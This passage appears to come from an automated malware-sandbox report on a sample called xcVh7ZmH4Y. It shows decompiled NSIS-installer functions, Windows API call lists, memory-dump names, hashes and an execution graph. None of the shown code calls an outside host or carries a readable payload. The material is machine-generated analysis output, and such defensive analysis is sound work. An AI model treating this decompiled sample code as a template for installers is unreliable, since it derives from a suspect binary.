				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp", "C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf0 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E0040649D(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nso9723.tmp\System.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}












                                                                                      0x0040263e
                                                                                      0x0040263e
                                                                                      0x0040263e
                                                                                      0x00402643
                                                                                      0x00402646
                                                                                      0x00402649
                                                                                      0x0040264e
                                                                                      0x00402650
                                                                                      0x00402670
                                                                                      0x004026aa
                                                                                      0x00402672
                                                                                      0x00402674
                                                                                      0x00402688
                                                                                      0x00402695
                                                                                      0x00402695
                                                                                      0x00402652
                                                                                      0x00402654
                                                                                      0x00402659
                                                                                      0x00402667
                                                                                      0x0040266a
                                                                                      0x004026af
                                                                                      0x004026b2
                                                                                      0x0040292e
                                                                                      0x0040292e
                                                                                      0x004026b8
                                                                                      0x004026c1
                                                                                      0x004026c3
                                                                                      0x004026e2
                                                                                      0x004015b4
                                                                                      0x004015b6
                                                                                      0x00000000
                                                                                      0x004015bc
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004026c3
                                                                                      0x00402c2d
                                                                                      0x00402c39

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll), ref: 00402695
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nso9723.tmp$C:\Users\user\AppData\Local\Temp\nso9723.tmp\System.dll
                                                                                      • API String ID: 1659193697-1090455584
                                                                                      • Opcode ID: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
                                                                                      • Instruction ID: edf8e5a6553ae7ef136857fb61bcac29e22bbc78049b19fa22ca3c34260198f3
                                                                                      • Opcode Fuzzy Hash: 4168bd1b0d4c7e657d9314b5f1fd2df3e3c464ca9a9d85ec85076bdcfae20528
                                                                                      • Instruction Fuzzy Hash: 2611EB71A00215BBCB10BFB18E4AAAE7665AF40744F25443FE002B71C2EAFC8891565E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403019 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00403019(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x42aa20; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x434f0c;
						if(_t2 >  *0x434f0c) {
							_t3 = CreateDialogParamW( *0x434f00, 0x6f, 0, E00402F93, 0);
							 *0x42aa20 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E00406946(0);
					}
				} else {
					_t6 =  *0x42aa20; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x42aa20 = 0;
					return _t6;
				}
			}






                                                                                      0x00403020
                                                                                      0x0040303a
                                                                                      0x00403040
                                                                                      0x0040304a
                                                                                      0x00403050
                                                                                      0x00403056
                                                                                      0x00403067
                                                                                      0x00403070
                                                                                      0x00000000
                                                                                      0x00403075
                                                                                      0x0040307c
                                                                                      0x00403042
                                                                                      0x00403049
                                                                                      0x00403049
                                                                                      0x00403022
                                                                                      0x00403022
                                                                                      0x00403029
                                                                                      0x0040302c
                                                                                      0x0040302c
                                                                                      0x00403032
                                                                                      0x00403039
                                                                                      0x00403039

                                                                                      APIs
                                                                                      • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,0040387D,?), ref: 0040302C
                                                                                      • GetTickCount.KERNEL32 ref: 0040304A
                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                                                                                      • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,0040387D,?), ref: 00403075
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                      • String ID:
                                                                                      • API String ID: 2102729457-0
                                                                                      • Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                      • Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
                                                                                      • Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
                                                                                      • Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 89%
                                                                                      			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}





                                                                                      0x00405517
                                                                                      0x00405521
                                                                                      0x0040553d
                                                                                      0x0040555f
                                                                                      0x00405562
                                                                                      0x00405568
                                                                                      0x00405572
                                                                                      0x00405573
                                                                                      0x00405575
                                                                                      0x0040557b
                                                                                      0x0040557b
                                                                                      0x00405585
                                                                                      0x00000000
                                                                                      0x00405593
                                                                                      0x0040554a
                                                                                      0x00405582
                                                                                      0x00405582
                                                                                      0x00000000
                                                                                      0x00405582
                                                                                      0x00405556
                                                                                      0x00405558
                                                                                      0x00000000
                                                                                      0x00405558
                                                                                      0x00405527
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040552e
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • IsWindowVisible.USER32(?), ref: 00405542
                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405593
                                                                                        • Part of subcall function 004044E5: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044F7
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                      • String ID:
                                                                                      • API String ID: 3748168415-3916222277
                                                                                      • Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                      • Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
                                                                                      • Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
                                                                                      • Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}







                                                                                      0x00403b58
                                                                                      0x00403b60
                                                                                      0x00403b67
                                                                                      0x00403b6a
                                                                                      0x00403b6a
                                                                                      0x00403b6c
                                                                                      0x00403b71
                                                                                      0x00403b78
                                                                                      0x00403b7e
                                                                                      0x00403b82
                                                                                      0x00403b83
                                                                                      0x00403b8b

                                                                                      APIs
                                                                                      • FreeLibrary.KERNEL32(?,75A43420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
                                                                                      • GlobalFree.KERNEL32(?), ref: 00403B78
                                                                                      Strings
                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: Free$GlobalLibrary
                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                      • API String ID: 1100898210-3355392842
                                                                                      • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                      • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                                      • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                                      • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                                      0x00405fa2
                                                                                      0x00405fa4
                                                                                      0x00405fa7
                                                                                      0x00405fd3
                                                                                      0x00405fac
                                                                                      0x00405fb5
                                                                                      0x00405fba
                                                                                      0x00405fc5
                                                                                      0x00405fc8
                                                                                      0x00405fe4
                                                                                      0x00405fca
                                                                                      0x00405fd1
                                                                                      0x00000000
                                                                                      0x00405fd1
                                                                                      0x00405fdd
                                                                                      0x00405fe1
                                                                                      0x00405fe1
                                                                                      0x00405fdb
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
                                                                                      • CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
                                                                                      • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.26208301659.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.26208278739.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208352397.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208378873.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208407009.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208560356.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208581287.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208601155.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208625683.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208645954.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208667319.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000001.00000002.26208698975.0000000000464000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_1_2_400000_xcVh7ZmH4Y.jbxd
                                                                                      Similarity
                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                      • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                                      • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                                      • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:20%
                                                                                      Dynamic/Decrypted Code Coverage:99.1%
                                                                                      Signature Coverage:0%
                                                                                      Total number of Nodes:226
                                                                                      Total number of Limit Nodes:23
                                                                                      execution_graph 64575 1d7a67f8 64576 1d7a6860 CreateWindowExW 64575->64576 64578 1d7a691c 64576->64578 64578->64578 64579 1d7a1ab8 64580 1d7a1ae7 64579->64580 64583 1d7a0824 64580->64583 64582 1d7a1c0c 64584 1d7a082f 64583->64584 64585 1d7a212a 64584->64585 64588 1d7a4892 64584->64588 64594 1d7a48a0 64584->64594 64585->64582 64589 1d7a48cb 64588->64589 64600 1d7a4e71 64589->64600 64590 1d7a494e 64591 1d7a37c8 GetModuleHandleW 64590->64591 64592 1d7a497a 64590->64592 64591->64592 64595 1d7a48cb 64594->64595 64599 1d7a4e71 GetModuleHandleW 64595->64599 64596 1d7a494e 64597 1d7a37c8 GetModuleHandleW 64596->64597 64598 1d7a497a 64596->64598 64597->64598 64599->64596 64601 1d7a4ead 64600->64601 64602 1d7a4f2e 64601->64602 64605 1d7a4ff0 64601->64605 64615 1d7a4fe0 64601->64615 64606 1d7a5005 64605->64606 64608 1d7a504a 64606->64608 64625 1d7a37c8 64606->64625 64609 1d7a37c8 GetModuleHandleW 64608->64609 64614 1d7a5216 64608->64614 64610 1d7a519b 64609->64610 64611 1d7a37c8 GetModuleHandleW 64610->64611 64610->64614 64612 1d7a51e9 64611->64612 64613 1d7a37c8 GetModuleHandleW 64612->64613 64612->64614 64613->64614 64614->64602 64616 1d7a4ff0 64615->64616 64617 1d7a37c8 GetModuleHandleW 64616->64617 64618 1d7a504a 64616->64618 64617->64618 64619 1d7a37c8 GetModuleHandleW 64618->64619 64624 1d7a5216 64618->64624 64620 1d7a519b 64619->64620 64621 1d7a37c8 GetModuleHandleW 64620->64621 64620->64624 64622 1d7a51e9 64621->64622 64623 1d7a37c8 GetModuleHandleW 64622->64623 64622->64624 64623->64624 64624->64602 64626 1d7a5350 GetModuleHandleW 64625->64626 64628 1d7a53c5 64626->64628 64628->64608 64748 1d7aa308 64749 1d7aa34e GetCurrentProcess 64748->64749 64751 1d7aa399 64749->64751 64752 1d7aa3a0 GetCurrentThread 64749->64752 64751->64752 64753 1d7aa3dd GetCurrentProcess 64752->64753 64754 1d7aa3d6 64752->64754 64755 1d7aa413 64753->64755 64754->64753 64756 1d7aa43b GetCurrentThreadId 64755->64756 64757 1d7aa46c 64756->64757 64758 1d68d01c 64759 1d68d034 64758->64759 64760 1d68d08e 64759->64760 64765 1d7ab15a 64759->64765 64777 1d7a69a0 64759->64777 64781 1d7a69b0 64759->64781 64785 1d7a469c 64759->64785 64766 1d7ab0e6 64765->64766 64767 1d7ab162 64765->64767 64766->64760 64768 1d7ab1c9 64767->64768 64770 1d7ab1b9 64767->64770 64821 1d7aa144 64768->64821 64796 1764a21 64770->64796 64802 1764a59 64770->64802 64808 1764a68 64770->64808 64813 1d7ab2f0 64770->64813 64817 1d7ab2e2 64770->64817 64771 1d7ab1c7 64778 1d7a69b0 64777->64778 64779 1d7a469c 2 API calls 64778->64779 64780 1d7a69f7 64779->64780 64780->64760 64782 1d7a69d6 64781->64782 64783 1d7a469c 2 API calls 64782->64783 64784 1d7a69f7 64783->64784 64784->64760 64788 1d7a46a7 64785->64788 64786 1d7ab1c9 64787 1d7aa144 2 API calls 64786->64787 64790 1d7ab1c7 64787->64790 64788->64786 64789 1d7ab1b9 64788->64789 64791 1764a21 2 API calls 64789->64791 64792 1d7ab2e2 2 API calls 64789->64792 64793 1d7ab2f0 2 API calls 64789->64793 64794 1764a68 2 API calls 64789->64794 64795 1764a59 2 API calls 64789->64795 64791->64790 64792->64790 64793->64790 64794->64790 64795->64790 64797 1764a2a 64796->64797 64799 1764a95 64796->64799 64797->64771 64798 1764b08 64798->64771 64828 1764b20 64799->64828 64831 1764b0f 64799->64831 64803 1764a1e 64802->64803 64805 1764a66 64802->64805 64803->64771 64804 1764b08 64804->64771 64806 1764b20 2 API calls 64805->64806 64807 1764b0f 2 API calls 64805->64807 64806->64804 64807->64804 64810 1764a7c 64808->64810 64809 1764b08 64809->64771 64811 1764b20 2 API calls 64810->64811 64812 1764b0f 2 API calls 64810->64812 64811->64809 64812->64809 64815 1d7ab2fe 64813->64815 64814 1d7aa144 2 API calls 64814->64815 64815->64814 64816 1d7ab3e7 64815->64816 64816->64771 64818 1d7ab2f0 64817->64818 64819 1d7aa144 2 API calls 64818->64819 64820 1d7ab3e7 64818->64820 64819->64818 64820->64771 64822 1d7aa14f 64821->64822 64823 1d7ab45a 64822->64823 64824 1d7ab504 64822->64824 64825 1d7ab4b2 CallWindowProcW 64823->64825 64827 1d7ab461 64823->64827 64826 1d7a469c CallWindowProcW 64824->64826 64825->64827 64826->64827 64827->64771 64829 1764b31 64828->64829 64834 1765f60 64828->64834 64829->64798 64832 1764b31 64831->64832 64833 1765f60 2 API calls 64831->64833 64832->64798 64833->64832 64837 1d7aa144 2 API calls 64834->64837 64838 1d7ab408 64834->64838 64835 1765f7a 64835->64829 64837->64835 64839 1d7ab40d 64838->64839 64840 1d7ab45a 64839->64840 64841 1d7ab504 64839->64841 64842 1d7ab4b2 CallWindowProcW 64840->64842 64844 1d7ab461 64840->64844 64843 1d7a469c CallWindowProcW 64841->64843 64842->64844 64843->64844 64844->64835 64629 1768f70 64631 1768fd5 64629->64631 64630 1769438 WaitMessage 64630->64631 64631->64630 64632 1769022 64631->64632 64655 17683d0 64656 17683f8 64655->64656 64659 1768424 64655->64659 64657 1768401 64656->64657 64660 1767694 64656->64660 64661 176769f 64660->64661 64662 176871b 64661->64662 64664 17676c4 64661->64664 64662->64659 64665 1768d58 OleInitialize 64664->64665 64666 1768dbc 64665->64666 64666->64662 64667 1763a10 64669 1763a41 64667->64669 64671 1763b41 64667->64671 64668 1763a4d 64669->64668 64676 1763c78 64669->64676 64689 1763c88 64669->64689 64670 1763a8d 64672 1d7a4892 GetModuleHandleW 64670->64672 64673 1d7a48a0 GetModuleHandleW 64670->64673 64672->64671 64673->64671 64677 1763c87 64676->64677 64678 1763cd3 64676->64678 64687 1763c78 4 API calls 64677->64687 64693 1763cb8 64677->64693 64684 1d7a37c8 GetModuleHandleW 64678->64684 64703 1d7a5349 64678->64703 64707 1d7a5321 64678->64707 64679 1763c92 64679->64670 64680 1763ce4 64681 1763cf4 64680->64681 64711 1764266 64680->64711 64715 1764278 64680->64715 64681->64670 64684->64680 64687->64679 64690 1763c92 64689->64690 64691 1763c78 4 API calls 64689->64691 64692 1763cb8 4 API calls 64689->64692 64690->64670 64691->64690 64692->64690 64694 1763cc7 64693->64694 64695 1763c71 64693->64695 64696 1763ce4 64694->64696 64697 1763cf4 64694->64697 64698 1d7a37c8 GetModuleHandleW 64694->64698 64699 1d7a5349 GetModuleHandleW 64694->64699 64700 1d7a5321 GetModuleHandleW 64694->64700 64695->64679 64696->64697 64701 1764266 LoadLibraryExW 64696->64701 64702 1764278 LoadLibraryExW 64696->64702 64697->64679 64698->64696 64699->64696 64700->64696 64701->64697 64702->64697 64704 1d7a5350 GetModuleHandleW 64703->64704 64706 1d7a53c5 64704->64706 64706->64680 64708 1d7a532e 64707->64708 64708->64680 64709 1d7a5398 GetModuleHandleW 64708->64709 64710 1d7a53c5 64709->64710 64710->64680 64712 1764278 64711->64712 64714 17642b1 64712->64714 64719 1762c68 64712->64719 64714->64681 64716 176428c 64715->64716 64717 1762c68 LoadLibraryExW 64716->64717 64718 17642b1 64716->64718 64717->64718 64718->64681 64720 1764328 LoadLibraryExW 64719->64720 64722 17643a1 64720->64722 64722->64714 64845 11125a7 TerminateThread 64846 111264e 64845->64846 64633 1518418 64634 1518437 LdrInitializeThunk 64633->64634 64636 151846b 64634->64636 64723 1d7aa610 64724 1d7aa5bc DuplicateHandle 64723->64724 64726 1d7aa613 64723->64726 64725 1d7aa5e6 64724->64725 64637 1760ee8 64638 1760ef4 64637->64638 64639 1760f21 64637->64639 64638->64639 64643 1761080 64638->64643 64647 1761129 64638->64647 64651 1761078 64638->64651 64644 17610c5 FindWindowW 64643->64644 64646 1761105 64644->64646 64646->64639 64648 17610e1 FindWindowW 64647->64648 64650 1761137 64647->64650 64649 1761105 64648->64649 64649->64639 64650->64639 64652 17610c5 FindWindowW 64651->64652 64654 1761105 64652->64654 64654->64639 64727 1767b58 64728 1767b72 64727->64728 64732 1768bb0 64728->64732 64740 1768a50 64728->64740 64729 1767b98 64729->64729 64733 1768d07 OleInitialize 64732->64733 64736 1768bcd 64732->64736 64735 1768dbc 64733->64735 64735->64729 64736->64733 64737 1768cfd 64736->64737 64738 1768bb0 OleInitialize 64736->64738 64739 1768a50 OleInitialize 64736->64739 64737->64729 64738->64736 64739->64736 64741 1768d07 OleInitialize 64740->64741 64744 1768bcd 64740->64744 64743 1768dbc 64741->64743 64743->64729 64744->64741 64745 1768cfd 64744->64745 64746 1768bb0 OleInitialize 64744->64746 64747 1768a50 OleInitialize 64744->64747 64745->64729 64746->64744 64747->64744

                                                                                      Executed Functions

